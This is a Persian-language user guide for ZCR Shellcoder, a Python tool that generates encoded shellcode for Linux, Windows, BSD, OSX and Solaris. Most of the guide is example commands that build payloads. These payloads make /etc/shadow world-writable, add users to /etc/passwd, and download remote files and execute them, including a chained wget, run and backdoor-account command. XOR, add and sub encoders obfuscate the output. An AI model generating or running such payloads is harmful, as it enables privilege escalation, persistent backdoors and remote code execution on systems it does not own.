

ZCR Shellcoder

نویسنده: علی رزنجو

ZeroDay Cyber Research Shellcoder (تولید کننده) یک نرم افزار متن باز به زبان پایتون میباشد که به شما امکان ساخت شلکد سفارشی (custimized) را برای سیستم عامل های لیست شده میدهد. این نرم افزار توانایی اجرا در Windows/Linux&Unix/OSX و سیستم های دیگر تحت پایتون 2.7.x را دارد.

چگونگی کار؟

برای نشان دادن لیست سوچ ها ، سوچ "-h" یا "--h" یا "-help" یا "--help" را اجرا کنید.

```
ZeroDay Cyber Research Shellcoder

Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-update => check for update

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY ; version: 1.0.0 ; Release Date: 2015 May 22
```

سوچ OS- به شما اجازه میدهد تا سیستم عامل تارگت (هدف) خود را انتخاب کنید. برای دیدن لیست سیستم عامل ها از سوچ -oslist استفاده کنید.

```
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY ; version: 1.0.0 ; Release Date: 2015 May 22
```

سوچ 0- جهت انتخاب نام فایل خروجی شما را که در پوشه output تولید خواهد شد می باشد.

سوچ job- جهت انتخاب فانکشن (Function) برای تولید شلکد می باشد. شما می توانید با استفاده از سوچ joblist- لیست فانکشن ها را مشاهده کنید.

```
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY ! version: 1.0.0 ! Release Date: 2015 May 22
```

سوچ encode- جهت انتخاب نوع انکود (Encode) شلکد خروجی می باشد، برای مشاهده لیست انکود ها از سوچ types- استفاده کنید.

```
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY ! version: 1.0.0 ! Release Date: 2015 May 22
```

سوچ update- جهت آپدیت کردن نرم افزار استفاده میشود، همچنین شما می توانید آرشیو فایل ها را در لینک زیر مشاهده کنید.

<https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive>

و آخرین آپدیت در اینجا در دسترس می باشد: <https://github.com/Ali-Razmjoo/ZCR-Shellcoder>

و: <http://www.z3r0d4y.com/p/zcr-shellcoder.html>

ویژگی های موجود

نمونه دستورات اجرایی:

Windows cmd:

```
python shellcoder.py -os linux_x86 -job chmod('/etc/shadow','777') -encode none -o shellcode.asm
```

```
python shellcoder.py -os linux_x86 -job write('/etc/passwd','Ali.....[add user]') -encode none -o shellcode.asm
```

```
python shellcoder.py -os linux_x86 -job exec('/usr/bin/python') -encode none -o shellcode.asm
```

system()

```
python shellcoder.py -os linux_x86 -job system('chmod[space]777[space]/etc/shadow') -encode none -o shellcode.asm
```

multi command execution

```
python shellcoder.py -os linux_x86 -job system('chmod[space]777[space]/etc/shadow;wget[space]exploit[space];chmod[space]+x[space]exploit[space];./exploit;echo[space]user:pass[space]>>[space]/etc/passwd') -encode none -o shellcode.asm
```

```
python shellcoder.py -os linux_x86 -encode none -job file_create('/root/Desktop/hello.txt','hello') -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job file_create('/root/Desktop/hello2.txt','hello[space]world[space]!') -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job dir_create('/root/Desktop/mydirectory') -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job download('http://www.z3r0d4y.com/exploit.type','myfile.type') -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type') -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job  
download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]77  
7[space]myfile.type;sh[space]myfile.type') -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job  
script_executor('script.type','D:\\myfile.type','./script.type') -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job  
script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh') -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job  
script_executor('ali.py','/root/Desktop/Oday.py','chmod[space]+x[space]ali.py;[space]pyt  
hon[space]ali.py') -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode xor_random -job chmod('/etc/shadow','777')  
-o file.txt
```

```
python shellcoder.py -os linux_x86 -encode xor_random -job chmod('/etc/passwd','444')  
-o file.txt
```

```
python shellcoder.py -os linux_x86 -encode xor_0x41414141 -job  
chmod('/etc/shadow','777') -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode xor_0x45872f4d -job  
chmod('/etc/passwd','444') -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode add_random -job chmod('/etc/passwd','444')  
-o file.txt
```

```
python shellcoder.py -os linux_x86 -encode add_0x41414141 -job  
chmod('/etc/passwd','777') -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode sub_random -job chmod('/etc/passwd','777')  
-o file.txt
```

```
python shellcoder.py -os linux_x86 -encode sub_0x41414141 -job  
chmod('/etc/passwd','444') -o file.txt
```

Linux and OSX Terminal:

you need to put a "\" behind the "(" and "\"" char in your switch.

```
python shellcoder.py -os linux_x86 -job chmod\\('/etc/shadow\\', \\ '777\\'\\) -encode none  
-o shellcode.asm
```

```
python shellcoder.py -os linux_x86 -job write\\('/etc/passwd\\', \\ 'Ali.....[add user] \\'\\) -  
encode none -o shellcode.asm
```

```
python shellcoder.py -os linux_x86 -job exec\\('/usr/bin/python\\'\\) -encode none -o  
shellcode.asm
```

system()

```
python shellcoder.py -os linux_x86 -job  
system\\('\\ chmod[space]777[space]/etc/shadow\\'\\) -encode none -o shellcode.asm
```

multi command execution

```
python shellcoder.py -os linux_x86 -job  
system\\('\\ chmod[space]777[space]/etc/shadow;wget[space]exploit[space];chmod[space]+  
x[space]exploit[space];./exploit;echo[space]user:pass[space]>>[space]/etc/passwd\\'\\) -  
encode none -o shellcode.asm
```

```
python shellcoder.py -os linux_x86 -encode none -job  
file_create\\('\\ /root/Desktop/hello.txt\\', \\ 'hello\\'\\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job  
file_create\\('\\ /root/Desktop/hello2.txt\\', \\ 'hello[space]world[space]!\\'\\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job  
dir_create\\('\\ /root/Desktop/mydirectory\\'\\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job  
download\\('\\ http://www.z3r0d4y.com/exploit.type\\', \\ 'myfile.type\\'\\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job  
download_execute\\('\\ http://www.z3r0d4y.com/exploit.type\\', \\ 'myfile.type\\', \\ './myfile.t  
ype\\'\\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job  
download_execute\('http://www.z3r0d4y.com/exploit.type',\myfile.type',\chmod[sp  
ace]777[space]myfile.type;sh[space]myfile.type'\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job  
script_executor\('script.type',\D:\\myfile.type',\./script.type'\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job  
script_executor\('z3r0d4y.sh',\'/root/z3r0d4y.sh',\sh[space]z3r0d4y.sh'\) -o  
file.txt
```

```
python shellcoder.py -os linux_x86 -encode none -job  
script_executor\('ali.py',\'/root/Desktop/Oday.py',\chmod[space]+x[space]ali.py;[spa  
ce]python[space]ali.py'\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode xor_random -job  
chmod\('\'/etc/shadow',\777'\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode xor_random -job  
chmod\('\'/etc/passwd',\444'\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode xor_0x41414141 -job  
chmod\('\'/etc/shadow',\777'\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode xor_0x45872f4d -job  
chmod\('\'/etc/passwd',\444'\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode add_random -job  
chmod\('\'/etc/passwd',\444'\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode add_0x41414141 -job  
chmod\('\'/etc/passwd',\777'\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode sub_random -job  
chmod\('\'/etc/passwd',\777'\) -o file.txt
```

```
python shellcoder.py -os linux_x86 -encode sub_0x41414141 -job  
chmod\('\'/etc/passwd',\444'\) -o file.txt
```

برای اطلاعات بیشتر و آنالیز برنامه و راهنمایی از وبسایت z3r0d4y.com بازدید فرمایید.

منابع:

ZeroDay Cyber Research z3r0d4y.com

Home : <http://www.z3r0d4y.com/p/zcr-shellcoder.html>

Analysis post: http://www.z3r0d4y.com/2015/05/zcr-shellcoder-review-and-analysis_20.html

Github: <https://github.com/Ali-Razmjoo/ZCR-Shellcoder>

Archive: <https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive>